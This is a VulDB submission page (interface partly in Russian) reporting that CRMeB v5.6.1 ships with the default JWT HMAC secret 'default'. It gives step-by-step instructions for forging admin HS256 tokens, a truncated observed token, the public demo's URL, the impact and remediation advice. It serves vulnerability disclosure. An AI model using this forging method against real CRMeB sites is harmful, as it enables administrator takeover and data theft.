Отправить #659843: CRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) —Информация

НазваниеCRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) —
ОписаниеCRMeB ships with a weak, predictable default JWT HMAC secret value set to "default". The official demo instance (v5.crmeb.net) and fresh deployments use the same default secret. Because the HMAC secret is known/predictable, an attacker can sign arbitrary HS256 JWTs that the server will accept. This allows forging tokens that impersonate any user (including administrators), resulting in authentication bypass, privilege escalation (administrator takeover), and unauthorized access to protected APIs and sensitive business data. Reproduction (concise) 1. Obtain a JWT issued by the CRMeB demo or deploy a fresh CRMeB instance. 2. Confirm iss claim (e.g., v5.crmeb.net) in the token payload. 3. Use the known secret "default" to sign an HS256 JWT with elevated claims (for example, {"jti":{"id":5,"type":"admin"}}). 4. Send the forged token in Authorization: Bearer <forged_jwt> to protected/admin endpoints — the server accepts the token and grants access. Evidence • Observed JWT from demo: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9....V3jebfZZJPpfLBT0TTu53rxSZfaNB4U-zusdikcJSFk (full token available). • Recovered HMAC secret: default. • iss claim points to v5.crmeb.net, confirming demo origin. Impact • Authentication bypass (any account impersonation) • Privilege escalation / administrator takeover • Unauthorized access and potential data exfiltration Suggested remediation (short) • Remove hard-coded/weak default secrets. Generate a strong random JWT secret at install time and require administrators to set/rotate it. • Invalidate tokens signed with the default secret and add documentation/warnings about secret management. Official demonstration website address: https://v5.crmeb.net/admin/login?redirect=%2Fadmin%2Findex
Пользователь
 BlackSpdier (UID 89912)
Представление22.09.2025 11:01 (7 месяцы назад)
Модерация04.10.2025 20:31 (12 days later)
Статуспринято
Запись VulDB327171 [CRMEB до 5.6.1 JWT HMAC Secret secret слабое шифрование]
Баллы17

ПредыдущийОбзорДалее

Do you need the next level of professionalism?

Upgrade your account now!